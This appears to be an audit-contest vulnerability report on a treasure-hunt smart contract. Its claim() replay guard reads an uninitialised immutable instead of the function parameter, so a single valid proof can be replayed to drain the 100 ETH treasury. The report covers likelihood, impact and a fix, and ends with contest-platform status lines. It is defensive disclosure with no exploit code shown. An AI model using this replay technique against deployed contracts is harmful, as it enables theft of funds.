Normal behaviour: claim() should pay out a REWARD of 10 ETH to recipient exactly once per unique treasureHash, enforced by the claimed mapping. After MAX_TREASURES = 10 distinct claims the hunt is over.
Specific issue: the anti-double-claim guard reads the contract-level immutable _treasureHash, which is declared but never initialised (line 35), instead of the user-supplied function parameter treasureHash. The immutable resolves to bytes32(0) forever, so claimed[_treasureHash] always reads claimed[0x0] — a slot that is never written by any realistic claim. The guard never fires, and the same (proof, treasureHash, recipient) tuple can be replayed up to 10 times, draining the full 100 ETH treasury with a single valid ZK proof.
Likelihood:
The claimer controls all three inputs (proof, treasureHash, recipient) and can simply re-send the same calldata — no additional skill, capital, or timing required.
Anyone observing a successful claim tx on-chain (or in the mempool) can copy the exact calldata and replay it; they only need a non-owner / non-claimer recipient, which the proof already binds to.
Impact:
Full loss of the 100 ETH treasury (10 replays × 10 ETH reward) off a single valid proof.
Permanent DoS of the remaining 9 treasures: claimsCount saturates at MAX_TREASURES, so legitimate treasure finders can never claim again — even if the owner re-funds the contract.
Self-contained Foundry test using a stubbed MockAcceptVerifier (returns true for any proof — models the attacker having already obtained one valid proof; identical dynamics with the real Barretenberg verifier):
Output:
Remove the unused immutable entirely (it serves no purpose) and make the guard read the function parameter. After the fix, a second call with the same treasureHash reverts with AlreadyClaimed(treasureHash) as intended.
The contest is live. Earn rewards by submitting a finding.
This is your time to appeal against judgements on your submissions.
Appeals are being carefully reviewed by our judges.
The contest is complete and the rewards are being distributed.